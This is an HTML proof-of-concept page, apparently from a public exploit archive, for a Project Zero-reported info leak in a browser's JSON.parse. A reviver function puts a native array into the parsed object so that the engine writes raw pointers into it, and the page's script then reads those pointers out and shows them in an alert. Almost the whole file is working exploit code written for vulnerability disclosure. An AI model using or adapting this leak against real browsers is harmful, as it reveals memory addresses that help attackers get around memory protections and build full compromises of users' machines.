64 lines
No EOL
1.2 KiB
HTML
64 lines
No EOL
1.2 KiB
HTML
<!--
|
|
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=952
|
|
|
|
There is an info leak in JSON.parse. If this function is called with a reviver, and the reviver modifies the output object to contain a native array, the Walk function assumes that this array is a Var array, and writes pointers to it. These pointers can then be read out of the array by script.
|
|
|
|
A minimal PoC is as follows:
|
|
|
|
var once = false;
|
|
var a = 1;
|
|
|
|
function f(){
|
|
if(!once){
|
|
a = new Array(1, 2, 3);
|
|
this[2] = a;
|
|
}
|
|
once = true;
|
|
return {};
|
|
|
|
}
|
|
|
|
|
|
JSON.parse("[1, 2, [4, 5]]", f);
|
|
|
|
A full PoC is attached. When loaded in a browser, this PoC will delay pointers in an alert dialog.
|
|
-->
|
|
|
|
<html>
|
|
<body>
|
|
<script>
|
|
|
|
var once = false;
|
|
var a = 1;
|
|
|
|
|
|
function f(){
|
|
if(!once){
|
|
a = new Array(1, 2, 3);
|
|
this[2] = a;
|
|
}
|
|
once = true;
|
|
//alert("f " + this);
|
|
return {};
|
|
|
|
}
|
|
|
|
|
|
JSON.parse("[1, 2, [4, 5]]", f);
|
|
var n = new Number(a[0]);
|
|
n = n >> 1;
|
|
var s = n.toString(16);
|
|
n = new Number(a[1]);
|
|
n = n >> 1;
|
|
s = s + n.toString(16);
|
|
n.length = 100;
|
|
n = new Number(a[2]);
|
|
n = n >> 1;
|
|
s = s + " " + n.toString(16);
|
|
n = new Number(a[3]);
|
|
n = n >> 1;
|
|
s = s + n.toString(16);
|
|
alert(s);
|
|
</script>
|
|
</body>
|
|
</html> |